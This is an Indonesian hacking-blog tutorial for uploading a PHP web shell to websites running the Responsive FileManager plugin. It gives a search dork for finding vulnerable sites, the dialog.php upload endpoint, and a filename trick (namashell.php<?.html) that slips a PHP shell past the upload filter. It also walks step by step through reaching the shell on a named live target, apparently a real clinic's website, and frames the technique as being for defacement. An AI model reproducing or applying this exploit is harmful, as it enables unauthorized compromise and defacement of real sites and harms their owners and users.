Responsive FileManager ( RFM ) Inject Filename Upload Shell + Live Target !


=====================================

Halo ker, gw ClownTerror072. Oke kali ini gw mau ngasi tau temuan celah terbaru di plugin rfm / Responsive FileManager.
Buat kalian yg dulu deface rfm cuma bisa upload script html doang, skrng ada cara upload shell php nya wkwk. Oke langsung aja ke tutorialnya...

=====================================

DORK : inurl:/filemanager

( kembangin sendiri, jan manja ker )

=====================================

EXPLOIT :

  • /filemanager/dialog.php
  • ubah ekstensi shell dari namashell.php ke namashell.php<?.html


=====================================

LANGKAH - LANGKAH :

  • Dorking dulu dan pilih salah satu target.
  • Live Target : https://www.gem.clinic/template/admin/filemanager/
  • Buka /filemanager/dialog.php.
  • Upload shell yang sudah kalian rename ( namashell.php<?.html )
  • Klik kanan salah satu file, dan pilih Show URL untuk melihat lokasi ke uploadnya, nah kebetulan target saya lokasi ke uploadnya di /assets/user-img/
  • Akses shellnya di "/assets/user/img/namashell.php" 
  • Extensi file .php<?.html akan otomatis ke rename menjadi .php, jadi kalian langsung buka namashell.php aja.

thx to : Jogjakarta Hacker Link, FlithyRoot, ClownTerror072

Post a comment

0 Comments